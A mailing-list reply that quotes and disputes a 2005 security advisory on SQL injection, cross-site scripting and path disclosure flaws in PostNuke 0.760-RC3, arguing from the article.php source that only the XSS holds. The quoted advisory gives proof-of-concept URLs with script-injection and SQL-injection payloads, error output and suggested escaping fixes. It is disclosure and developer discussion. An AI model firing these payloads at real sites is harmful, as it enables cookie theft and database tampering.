Re: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3
In-Reply-To: <20050408023602.4627.qmail@xxxxxxxxxxxxxxxxxxxxx>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Dcrab 's Security Advisory
>[Hsc Security Group] http://www.hackerscenter.com/
>[dP Security] http://digitalparadox.org/
>
>Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn
>more at http://www.digitalparadox.org/services.ah
>
>GET INFORMED FIRST ABOUT MY ADVISORIES http://www.digitalparadox.org
>
>Severity: Medium
>Title: Sql injection, xss and path disclosure vulnerabilities in PostNuke
>0.760-RC3
>Date: 08/04/2005
>
>Vendor: PostNuke
>Vendor Website: http://www.postnuke.com
>Summary: There are, sql injection, xss and path disclosure vulnerabilities in
>postnuke 0.760-rc3.
>
>
>Proof of Concept Exploits:
>
>http://localhost/admin.php?module="><script>alert(document.cookie)</script>&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480
>Pops cookie
>
>
>http://localhost/modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480
>SQL INJECTION (look wayyy on the bottom of the page)
>
>DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the
>manual that corresponds to your MySQL server version for
>the right syntax to use near '\'SQL_INJECTION' at line 23
Are you sure, is that sql injection in 0.760=RC3?
Code "article.php":
if ((empty($sid) && empty($tid)) ||
(!is_numeric($sid) && !is_numeric($tid))) {
include 'header.php';
echo _MODARGSERROR;
include 'footer.php';
exit;
}
So exit; ;] Bug don't work in 0.760-RC3. And in 0.750 exist path d.
---
Fatal error: Cannot redeclare head() (previously declared in
/www/PostNuke-0.750/html/header.php:44) in /www/PostNuke-0.750/html/header.php
on line 142
---
>
>
>http://localhost/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id='&POSTNUKESID=355776cfb622466924a7096d4471a480
>Server Path disclosure
>
>Fatal error: Call to a member function on a non-object in
>/home/httpd/vhosts/localhost/httpdocs/modules/Reviews/index.php on line 976
>
>
>http://localhost/user.php?op="><script>alert(document.cookie)</script>&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
>Pops cookie
>
>
>Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(),
>mysql_real_escape_string() and other functions for input
>validation before passing user input to the mysql database, or before echoing
>data on the screen, would solve these problems.
>
>Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
>
>Author:
>These vulnerabilties have been found and released by Diabolic Crab, Email:
>dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel
>free to contact me regarding these vulnerabilities. You can find me at,
>http://www.hackerscenter.com or http://digitalparadox.org/.
>Lookout or my soon to come out book on Secure coding with php.
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
>
>iQA/AwUBQlXvwyZV5e8av/DUEQKa2QCgiDjVDkjyVdrXhbww/3zI8ksr8/EAnikN
>BDxd/CIvzHYmLQAyb5suDR8K
>=7MBl
>-----END PGP SIGNATURE-----
>
>
Frist check CVS. And if you public adv, frist check security contact. You bug:
http://cvs.postnuke.com/viewcvs.cgi/Historic_PostNuke_Library/postnuke-devel/html/user.php.diff?r1=1.18&r2=1.19
only xss.